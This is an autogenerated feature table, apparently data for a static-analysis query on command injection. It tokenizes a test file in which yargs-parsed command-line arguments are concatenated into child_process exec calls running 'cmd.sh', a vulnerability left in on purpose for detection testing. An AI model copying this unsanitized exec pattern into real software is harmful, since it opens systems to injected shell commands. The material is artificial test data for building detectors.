autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:43 | require ... ).array | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:50 | exceptional return of require ... ("foo") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:50 | exceptional return of require ... ("foo") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:50 | exceptional return of require ... ("foo") | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:50 | exceptional return of require ... ("foo") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:50 | exceptional return of require ... ("foo") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:50 | require ... ("foo") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:50 | require ... ("foo") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:50 | require ... ("foo") | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:50 | require ... ("foo") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:50 | require ... ("foo") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:56 | require ... ).parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:56 | require ... ).parse | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:56 | require ... ).parse | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:56 | require ... ).parse | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:56 | require ... ).parse | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:58 | exceptional return of require ... parse() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:58 | exceptional return of require ... parse() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:58 | exceptional return of require ... parse() | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:58 | exceptional return of require ... parse() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:58 | exceptional return of require ... parse() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:62 | require ... e().foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:62 | require ... e().foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:62 | require ... e().foo | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:62 | require ... e().foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:62 | require ... e().foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:62 | require ... e().foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:30:43:36 | "yargs" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:30:43:36 | "yargs" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:30:43:36 | "yargs" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:30:43:36 | "yargs" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:30:43:36 | "yargs" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:30:43:36 | "yargs" | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:30:43:36 | "yargs" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:30:43:36 | "yargs" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:39:43:43 | array | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:39:43:43 | array | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:39:43:43 | array | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:39:43:43 | array | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:39:43:43 | array | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:45:43:49 | "foo" | CalleeFlexibleAccessPath | import(!).array | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:45:43:49 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:45:43:49 | "foo" | calleeImports | yargs | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:45:43:49 | "foo" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:45:43:49 | "foo" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:45:43:49 | "foo" | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:45:43:49 | "foo" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:45:43:49 | "foo" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:52:43:56 | parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:52:43:56 | parse | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:52:43:56 | parse | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:52:43:56 | parse | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:52:43:56 | parse | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:60:43:62 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:60:43:62 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:60:43:62 | foo | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:60:43:62 | foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:60:43:62 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:1:73:2 | (functi ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:1:73:2 | (functi ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:1:73:2 | (functi ... T OK\\n}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | cp | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | require | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | this | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:46:1 | this | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | 'arguments' object of anonymous function | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | 'arguments' object of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | exceptional return of anonymous function | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | exceptional return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | functio ... OT OK\\n} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | return of anonymous function | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:46:2:73:1 | return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:51:2 | {\\n\\t\\targ ... \\t\\t},\\n\\t} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:51:2 | {\\n\\t\\targ ... \\t\\t},\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:51:2 | {\\n\\t\\targ ... \\t\\t},\\n\\t} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:51:2 | {\\n\\t\\targ ... \\t\\t},\\n\\t} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:51:2 | {\\n\\t\\targ ... \\t\\t},\\n\\t} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:53:12 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:53:12 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:53:12 | args | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:53:12 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:53:12 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:53:12 | {\\n\\t\\targ ... mmand() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:53:12 | {\\n\\t\\targ ... mmand() | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:53:12 | {\\n\\t\\targ ... mmand() | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:53:12 | {\\n\\t\\targ ... mmand() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:47:8:53:12 | {\\n\\t\\targ ... mmand() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:48:6 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:48:6 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:48:6 | argv | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:48:6 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:48:6 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:9:50:3 | {\\n\\t\\t\\t...args\\n\\t\\t} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:9:50:3 | {\\n\\t\\t\\t...args\\n\\t\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:9:50:3 | {\\n\\t\\t\\t...args\\n\\t\\t} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:48:9:50:3 | {\\n\\t\\t\\t...args\\n\\t\\t} | enclosingFunctionName | | +| 